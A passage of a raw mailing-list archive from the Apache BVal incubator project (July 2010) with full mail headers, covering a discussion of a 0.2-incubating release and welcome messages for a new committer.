FCyE7SJkz/66Bnn20Pxs2w+SCvszE0ca4QvpTfDggheUBySBykGp0vqND52tq11pwI1G 8WEIXaBXQJ8jfw+hK3f510tWLXa423cjXDVHY= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id r16mr976141and.170.1279749936096; Wed, 21 Jul 2010 15:05:36 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Wed, 21 Jul 2010 15:05:36 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> Date: Wed, 21 Jul 2010 23:05:36 +0100 Message-ID: <[email protected]> Subject: Re: [DISCUSS] Time for a 0.2-incubating release? From: Carlos Vara <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=0016e644cc2857a7a3048bed009b X-Virus-Checked: Checked by ClamAV on apache.org --0016e644cc2857a7a3048bed009b Content-Type: text/plain; charset=ISO-8859-1 Some things would need to be moved to a 0.3 release (like the logging migration), but i think it would be beneficial to have a release that lives to the claim of being able to compile in JDK 1.5. +1 On Tue, Jul 20, 2010 at 3:40 AM, Donald Woods <[email protected]> wrote: > Given the Java 5 compile/runtime issue that was discovered after the > 0.1-incubating release, I'd prefer that we get a 0.2 release out sooner > than later. How about a target of early August for the next release? > > Any items that we'd like to see included for 0.2? > > > -Donald > --0016e644cc2857a7a3048bed009b-- From [email protected] Tue Jul 27 19:37:35 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 36208 invoked from network); 27 Jul 2010 19:37:35 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 27 Jul 2010 19:37:35 -0000 Received: (qmail 43920 invoked by uid 500); 27 Jul 2010 19:37:35 -0000 Delivered-To: [email protected] Received: (qmail 43833 invoked by uid 500); 27 Jul 2010 19:37:34 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 43816 invoked by uid 99); 27 Jul 2010 19:37:34 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 27 Jul 2010 19:37:34 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=RCVD_IN_DNSWL_NONE,SPF_NEUTRAL,UNPARSEABLE_RELAY X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO smtp106.prem.mail.ac4.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Tue, 27 Jul 2010 19:37:26 +0000 Received: (qmail 1368 invoked from network); 27 Jul 2010 19:37:05 -0000 Received: from drwoods.local ([email protected] with plain) by smtp106.prem.mail.ac4.yahoo.com with SMTP; 27 Jul 2010 12:37:05 -0700 PDT X-Yahoo-SMTP: sCI.ryiswBB7FW.DxjU523c87MI- X-YMail-OSG: m0E8JZ8VM1nYShMjgwosdYv6Iq07vSA1G0oOBzoC2A4dMfK ChMD07klPdeIMxRfblmhSZgbs.4xCqSSKwiEX6JEeCThkaTcyzXVQSJSuTkI bLuhLZlh4MyljSmXDtj.H5ei6oBiukfX7riy.0U8AA8egMwGAwLG4ALrw.oo 0TrWF59hhETNtQsl.ozDl5ZBE9Mtoppb9Tbnt6USgpjTSsBRBmEyo3WUECzd xkweYkNrG3xbVhZSEqcumi1hQ9bvnJokadD2JFSv2cFvPhw.DoLWHfsKsHyT m1xRsTWCtM0Ov_Hy14cxs_Fahpxw- X-Yahoo-Newman-Property: ymail-3 Message-ID: <[email protected]> Date: Tue, 27 Jul 2010 15:37:05 -0400 From: Donald Woods <[email protected]> User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:161.129.204.104) Gecko/20100713 Lightning/1.0b2 Thunderbird/3.1.1 MIME-Version: 1.0 To: [email protected] CC: [email protected] Subject: [ANNOUNCE] Matt Benson as a new Committer X-Enigmail-Version: 1.1.1 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org The BVAL PPMC recently extended committer karma to Matt and he has accepted. Welcome aboard Matt! -Donald From [email protected] Tue Jul 27 19:39:26 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 36672 invoked from network); 27 Jul 2010 19:39:26 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 27 Jul 2010 19:39:26 -0000 Received: (qmail 48688 invoked by uid 500); 27 Jul 2010 19:39:26 -0000 Delivered-To: [email protected] Received: (qmail 48654 invoked by uid 500); 27 Jul 2010 19:39:26 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 48645 invoked by uid 99); 27 Jul 2010 19:39:26 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 27 Jul 2010 19:39:26 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-gx0-f175.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 27 Jul 2010 19:39:18 +0000 Received: by gxk2 with SMTP id 2so1565522gxk.6 for <[email protected]>; Tue, 27 Jul 2010 12:38:57 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:content-type:mime-version :subject:from:in-reply-to:date:content-transfer-encoding:message-id :references:to:x-mailer; bh=ABa6FRseqeM1/gR3YoQOs7+mCtVbq/7F6uiJS/JzRDs=; b=Co3kgLJd8cP3Nlqkc4sVZoydwBtpWkjUSRDSu10k4NAFz2sHn+vpktQ665iZmyOMVw 1EASUDZP+kKcs/lUD8+7ILHThIRzBKsaxPFVOqu5v1oafy0BZLx5R44INMRAny7k/sdg vbL6oHSWvi9erMVu52kS+jii/8Q5o9hJXSpZ8= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=content-type:mime-version:subject:from:in-reply-to:date :content-transfer-encoding:message-id:references:to:x-mailer; b=mdeSsUD1quBxzhVhnYBdRMQr0381XcxMN6uDq3ck2qE4fJgbk5ICNnTEQMNiQLbJao 9tnLhFcgau/6+CLgf+Vbna/0OSgqqB0R7u24FGBmnOnCfIAXuhRvECe2iIqcKqqbDTx1 jVTdheOb+Z9a6Rod/SXsKQDizwW5d+dOIs9tc= Received: by 161.129.204.104 with SMTP id n6mr11209737ybd.90.1280259537496; Tue, 27 Jul 2010 12:38:57 -0700 (PDT) Received: from [161.129.204.104] (adsl-068-213-090-227.sip.bhm.bellsouth.net [161.129.204.104]) by mx.google.com with ESMTPS id u41sm7388476yba.22.2161.129.204.104.38.55 (version=TLSv1/SSLv3 cipher=RC4-MD5); Tue, 27 Jul 2010 12:38:56 -0700 (PDT) Content-Type: text/plain; charset=us-ascii Mime-Version: 1.0 (Apple Message framework v1081) Subject: Re: [ANNOUNCE] Matt Benson as a new Committer From: Matt Benson <[email protected]> In-Reply-To: <[email protected]> Date: Tue, 27 Jul 2010 14:38:52 -0500 Content-Transfer-Encoding: quoted-printable Message-Id: <[email protected]> References: <[email protected]> To: [email protected] X-Mailer: Apple Mail (2.1081) On Jul 27, 2010, at 2:37 PM, Donald Woods wrote: > The BVAL PPMC recently extended committer karma to Matt and he has > accepted. Welcome aboard Matt! >=20 Oops, kind of anticlimactic since I already started committing stuff. = Officially, thanks all! ;) -Matt > -Donald >=20 From [email protected] Tue Jul 27 19:55:51 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 39566 invoked from network); 27 Jul 2010 19:55:51 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 27 Jul 2010 19:55:51 -0000 Received: (qmail 77012 invoked by uid 500); 27 Jul 2010 19:55:51 -0000 Delivered-To: [email protected] Received: (qmail 76986 invoked by uid 500); 27 Jul 2010 19:55:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 76978 invoked by uid 99); 27 Jul 2010 19:55:51 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 27 Jul 2010 19:55:51 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=RCVD_IN_DNSWL_NONE,SPF_NEUTRAL,UNPARSEABLE_RELAY X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO smtp107.prem.mail.ac4.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Tue, 27 Jul 2010 19:55:43 +0000 Received: (qmail 23860 invoked from network); 27 Jul 2010 19:55:22 -0000 Received: from drwoods.local ([email protected] with plain) by smtp107.prem.mail.ac4.yahoo.com with SMTP; 27 Jul 2010 12:55:22 -0700 PDT X-Yahoo-SMTP: sCI.ryiswBB7FW.DxjU523c87MI- X-YMail-OSG: 3GtFzVIVM1mtrDELxtop_haa6jvJ6CPL6AfxhWaoOm.dsmh 2n6aEw6ytlfe1lmpQg40k1ewqmr6PsFzYLRYKhrIJ27PxvSdHEzH_2y3yfYw 9p5XYF27Rk7CC5.EU7vctRKBnpvHoXiF6z2hgLVNopdrBinXLIvXeKo7xMrN JtVKjuR7zX_jhbwKqCKMGBdpSmQcMYUOPCYxoetAJgZzCm8iODV2dTuF12pR 7ahqK3twNj51g23y2Sn8- X-Yahoo-Newman-Property: ymail-3 Message-ID: <[email protected]> Date: Tue, 27 Jul 2010 15:55:21 -0400 From: Donald Woods <[email protected]> User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:161.129.204.104) Gecko/20100713 Lightning/1.0b2 Thunderbird/3.1.1 MIME-Version: 1.0 To: [email protected] Subject: Re: [ANNOUNCE] Matt Benson as a new Committer References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> X-Enigmail-Version: 1.1.1 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org No problem. I've been swamped with work, but wanted to announce it for those that don't watch the commits. -Donald On 7/27/10 3:38 PM, Matt Benson wrote: > On Jul 27, 2010, at 2:37 PM, Donald Woods wrote: > >> The BVAL PPMC recently extended committer karma to Matt and he has >> accepted. Welcome aboard Matt! >> > > Oops, kind of anticlimactic since I already started committing stuff. Officially, thanks all! ;) > > -Matt > >> -Donald >> > > From [email protected] Tue Jul 27 21:24:29 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 76779 invoked from network); 27 Jul 2010 21:24:29 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 27 Jul 2010 21:24:29 -0000 Received: (qmail 88695 invoked by uid 500); 27 Jul 2010 21:24:29 -0000 Delivered-To: [email protected] Received: (qmail 88666 invoked by uid 500); 27 Jul 2010 21:24:28 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 88658 invoked by uid 99); 27 Jul 2010 21:24:28 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 27 Jul 2010 21:24:28 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=FREEMAIL_FROM,HTML_MESSAGE,RCVD_IN_DNSWL_NONE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-vw0-f47.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 27 Jul 2010 21:24:22 +0000 Received: by vws13 with SMTP id 13so3864326vws.6 for <[email protected]>; Tue, 27 Jul 2010 14:24:01 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:in-reply-to :references:date:message-id:subject:from:to:content-type; bh=//Ar6svvHm5skZrxkkC1FqOETHcgBA03URYn4c2YmdI=; b=tJWjQnBbn5oe9mLlTrbMIW+FqCvTyAY+ayjItwEThCQnytU6VxWeXlDSQGlAaUlEMd 4b/58CA1nNqciq5On47UzZGV+ZyCDED0jxHKNdXG0mS3fgEeeqPdE9b3eloLQzpXT0n6 DJshZIJoOzpuTEhdjwIrijlKX5ppXvZGP1OEE= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=V7TkmawCC8pyrC8ys9F8mIvB4p/Jii9KNl+jqCsq1PjM/8W5HW2W3vk27ds3I6iNtB hvES84mQK40OdrD9orJUJipmhSJkpvPWocezjW/reYuGblurrY4gB38F1hMTMQr+a7s7 N96TvnydNTHSquxYfIcsmxfPQbKYnEEee6YY0= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id h16mr5524670vcr.159.1280265841011; Tue, 27 Jul 2010 14:24:01 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Tue, 27 Jul 2010 14:24:00 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> Date: Tue, 27 Jul 2010 22:24:00 +0100 Message-ID: <[email protected]> Subject: Re: [ANNOUNCE] Matt Benson as a new Committer From: Carlos Vara <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=0016369fa1bcabed6f048c651ebb --0016369fa1bcabed6f048c651ebb Content-Type: text/plain; charset=ISO-8859-1 Welcome officially aboard Matt! On Tue, Jul 27, 2010 at 8:55 PM, Donald Woods <[email protected]> wrote: > No problem. I've been swamped with work, but wanted to announce it for > those that don't watch the commits. > > -Donald > > > On 7/27/10 3:38 PM, Matt Benson wrote: > > On Jul 27, 2010, at 2:37 PM, Donald Woods wrote: > > > >> The BVAL PPMC recently extended committer karma to Matt and he has > >> accepted. Welcome aboard Matt! > >> > > > > Oops, kind of anticlimactic since I already started committing stuff. > Officially, thanks all! ;) > > > > -Matt > > > >> -Donald > >> > > > > > --0016369fa1bcabed6f048c651ebb-- From [email protected] Wed Jul 28 00:01:58 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 25352 invoked from network); 28 Jul 2010 00:01:57 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 28 Jul 2010 00:01:57 -0000 Received: (qmail 30529 invoked by uid 500); 28 Jul 2010 00:01:57 -0000 Delivered-To: [email protected] Received: (qmail 30489 invoked by uid 500); 28 Jul 2010 00:01:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 30481 invoked by uid 99); 28 Jul 2010 00:01:57 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jul 2010 00:01:57 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ew0-f47.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jul 2010 00:01:51 +0000 Received: by ewy7 with SMTP id 7so1601276ewy.6 for <[email protected]>; Tue, 27 Jul 2010 17:01:31 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:in-reply-to :references:date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=wIDGA3UOtH9W2IctBDNJ3DW0fOvbblP4tiQ7hbwnKWU=; b=NKArje2H0cGOtfZuILqxu+1/dfsNazYzsWzum5/dGa49pfGuvm4CJ842V6IbGZjGrV 9gE2yld7kwdWOKRr3E6Bg72ecKRSSj83YmBGTXoge5Hw7j/lPK43AEWWrJjxLRBoLccd stbEzK645Ugb6cZECzPPRY8wdqk3PBs4BXYig= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=T3LkNiCp7SMB2UROak7p7hWICq775JAb8VZazV1QL0xKnGQdCD5mhhwbQ706QPkhCt rSvxCh/uV3yRF+K9reGSQj57KwLICt2QQkbGMerNWkLeMhQm/6QsJ/yeNDKqSnYatke+ DFMPhG3ZCFt16EABejWQxWarKuhy92EDtirXI= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id d10mr3047576ebb.55.1280275291388; Tue, 27 Jul 2010 17:01:31 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Tue, 27 Jul 2010 17:01:31 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Wed, 28 Jul 2010 03:01:31 +0300 Message-ID: <[email protected]> Subject: Re: [ANNOUNCE] Matt Benson as a new Committer From: Mohammad Nour El-Din <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org welcome aboard Matt :) On Wed, Jul 28, 2010 at 12:24 AM, Carlos Vara <[email protected]> wrote: > Welcome officially aboard Matt! > > > On Tue, Jul 27, 2010 at 8:55 PM, Donald Woods <[email protected]> wrote: > >> No problem. =A0I've been swamped with work, but wanted to announce it fo= r >> those that don't watch the commits. >> >> -Donald >> >> >> On 7/27/10 3:38 PM, Matt Benson wrote: >> > On Jul 27, 2010, at 2:37 PM, Donald Woods wrote: >> > >> >> The BVAL PPMC recently extended committer karma to Matt and he has >> >> accepted. =A0Welcome aboard Matt! >> >> >> > >> > Oops, kind of anticlimactic since I already started committing stuff. >> =A0Officially, thanks all! =A0;) >> > >> > -Matt >> > >> >> -Donald >> >> >> > >> > >> > --=20 Thanks - Mohammad Nour =A0 Author of (WebSphere Application Server Community Edition 2.0 User Guid= e) =A0 http://www.redbooks.ibm.com/abstracts/sg247585.html - LinkedIn: http://www.linkedin.com/in/mnour - Blog: http://tadabborat.blogspot.com ---- "Life is like riding a bicycle. To keep your balance you must keep moving" - Albert Einstein "Writing clean code is what you must do in order to call yourself a professional. There is no reasonable excuse for doing anything less than your best." - Clean Code: A Handbook of Agile Software Craftsmanship "Stay hungry, stay foolish." - Steve Jobs From [email protected] Wed Jul 28 12:54:34 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88083 invoked from network); 28 Jul 2010 12:54:34 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 28 Jul 2010 12:54:34 -0000 Received: (qmail 29466 invoked by uid 500); 28 Jul 2010 12:54:34 -0000 Delivered-To: [email protected] Received: (qmail 29421 invoked by uid 500); 28 Jul 2010 12:54:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 29412 invoked by uid 99); 28 Jul 2010 12:54:32 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jul 2010 12:54:32 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=RCVD_IN_DNSWL_NONE,SPF_NEUTRAL,UNPARSEABLE_RELAY X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO smtp109.prem.mail.ac4.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Wed, 28 Jul 2010 12:54:24 +0000 Received: (qmail 49345 invoked from network); 28 Jul 2010 12:54:03 -0000 Received: from drwoods.local ([email protected] with plain) by smtp109.prem.mail.ac4.yahoo.com with SMTP; 28 Jul 2010 05:54:03 -0700 PDT X-Yahoo-SMTP: sCI.ryiswBB7FW.DxjU523c87MI- X-YMail-OSG: fZ57aXYVM1lXrYGzzdARuM7xXDXdjIV8MBNpTZL0VU5FqL_ 0hvAZfbOpFB_ronCNOlNhmPSZQdcXCZO.1YPEk7S9T43Q6DEOYHxl3DY_UQb tmW6UU7ivJ7VxMQL2LuELBFvvRHW44HeMl7rf.ouoVKSM6apccRLC6aqOM21 5yc4ioDxorBmRLqoeQc3DQdwVuvH4lh1F9uM6Vi6X7RsT6IBuauIdLBuGdaB 45xLk8UlAX7JMo4oLDEgooTAPWqmKwFqSW3EBXlA2myRxTG49g9qILah5H5a fSrWQcwLtSSA17CBjuqDmsRs- X-Yahoo-Newman-Property: ymail-3 Message-ID: <[email protected]> Date: Wed, 28 Jul 2010 08:54:02 -0400 From: Donald Woods <[email protected]> User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:161.129.204.104) Gecko/20100713 Lightning/1.0b2 Thunderbird/3.1.1 MIME-Version: 1.0 To: [email protected] Subject: Re: [DISCUSS] Time for a 0.2-incubating release? References: <[email protected]> In-Reply-To: <[email protected]> X-Enigmail-Version: 1.1.1 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Anyone have any critical issues they want to get in before a 0.2 release? I'll try to start a release tomorrow if there are no objections. -Donald On 7/19/10 10:40 PM, Donald Woods wrote: > Given the Java 5 compile/runtime issue that was discovered after the > 0.1-incubating release, I'd prefer that we get a 0.2 release out sooner > than later. How about a target of early August for the next release? > > Any items that we'd like to see included for 0.2? > > > -Donald > From [email protected] Wed Jul 28 14:23:49 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 20982 invoked from network); 28 Jul 2010 14:23:49 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 28 Jul 2010 14:23:49 -0000 Received: (qmail 37548 invoked by uid 500); 28 Jul 2010 14:23:49 -0000 Delivered-To: [email protected] Received: (qmail 37508 invoked by uid 500); 28 Jul 2010 14:23:48 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 37500 invoked by uid 99); 28 Jul 2010 14:23:47 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jul 2010 14:23:47 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=FREEMAIL_FROM,HTML_MESSAGE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ww0-f43.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jul 2010 14:23:41 +0000 Received: by wwc33 with SMTP id 33so1137458wwc.0 for <[email protected]>; Wed, 28 Jul 2010 07:23:21 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:in-reply-to :references:date:message-id:subject:from:to:content-type; bh=dceLvXbioAbtGDYUt4he4CBJfJ3YtVtfZhE3Q2DvqHg=; b=tBUQHjoHq5GV+Z72qn+7zQJK528hZNc/z2fDRLIGB3k1ece00UgNaTCQZCSTFyOUg3 cLrWd+Km8wDmSHm9ls3Jy3R6ZgXBd00hYML+gFxt9yf6PsWvZ+FA064EY3woN8Pe+KqV k3cpQDuAh9N4duMJLAVrokj1eT1m2kRw9bglk= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=vREgKcXrL2cN0TlNIo2tnSimuGXZQsimi+k9SSnKsK6KcZ280UoqA6bxXzS6awVSkX Q3a9m7Zq+uKdpfA36eIJ8jVhKRiEScsR75BShEwRs/Kiojz8ZzUdTeipfk20/jWfIQoD c2ym0ERKvROGIWkCzNxTHwZHbKdCf8HUek95M= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id j5mr9845565wbc.111.1280326999895; Wed, 28 Jul 2010 07:23:19 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Wed, 28 Jul 2010 07:23:19 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Wed, 28 Jul 2010 09:23:19 -0500 Message-ID: <[email protected]> Subject: Re: [ANNOUNCE] Matt Benson as a new Committer From: Jeremy Bauer <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=0022158bfd9106705d048c735ca3 X-Virus-Checked: Checked by ClamAV on apache.org --0022158bfd9106705d048c735ca3 Content-Type: text/plain; charset=ISO-8859-1 Congratulations, Matt! Welcome aboard. -Jeremy On Tue, Jul 27, 2010 at 7:01 PM, Mohammad Nour El-Din < [email protected]> wrote: > welcome aboard Matt :) > > On Wed, Jul 28, 2010 at 12:24 AM, Carlos Vara <[email protected]> wrote: > > Welcome officially aboard Matt! > > > > > > On Tue, Jul 27, 2010 at 8:55 PM, Donald Woods <[email protected]> wrote: > > > >> No problem. I've been swamped with work, but wanted to announce it for > >> those that don't watch the commits. > >> > >> -Donald > >> > >> > >> On 7/27/10 3:38 PM, Matt Benson wrote: > >> > On Jul 27, 2010, at 2:37 PM, Donald Woods wrote: > >> > > >> >> The BVAL PPMC recently extended committer karma to Matt and he has > >> >> accepted. Welcome aboard Matt! > >> >> > >> > > >> > Oops, kind of anticlimactic since I already started committing stuff. > >> Officially, thanks all! ;) > >> > > >> > -Matt > >> > > >> >> -Donald > >> >> > >> > > >> > > >> > > > > > > -- > Thanks > - Mohammad Nour > Author of (WebSphere Application Server Community Edition 2.0 User Guide) > http://www.redbooks.ibm.com/abstracts/sg247585.html > - LinkedIn: http://www.linkedin.com/in/mnour > - Blog: http://tadabborat.blogspot.com > ---- > "Life is like riding a bicycle. To keep your balance you must keep moving" > - Albert Einstein > > "Writing clean code is what you must do in order to call yourself a > professional. There is no reasonable excuse for doing anything less > than your best." > - Clean Code: A Handbook of Agile Software Craftsmanship > > "Stay hungry, stay foolish." > - Steve Jobs > --0022158bfd9106705d048c735ca3-- From [email protected] Wed Jul 28 14:56:46 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 30678 invoked from network); 28 Jul 2010 14:56:46 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 28 Jul 2010 14:56:46 -0000 Received: (qmail 68927 invoked by uid 500); 28 Jul 2010 14:56:46 -0000 Delivered-To: [email protected] Received: (qmail 68906 invoked by uid 500); 28 Jul 2010 14:56:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 68897 invoked by uid 99); 28 Jul 2010 14:56:46 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jul 2010 14:56:46 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=FREEMAIL_FROM,HTML_MESSAGE,RCVD_IN_DNSWL_NONE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-iw0-f175.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jul 2010 14:56:40 +0000 Received: by iwn34 with SMTP id 34so4973179iwn.6 for <[email protected]>; Wed, 28 Jul 2010 07:56:19 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:mime-version:received:in-reply-to :references:from:date:message-id:subject:to:content-type; bh=nppoXza2gMPc1nHqSZabXjV18a9r52KHp5zw7mXxRSw=; 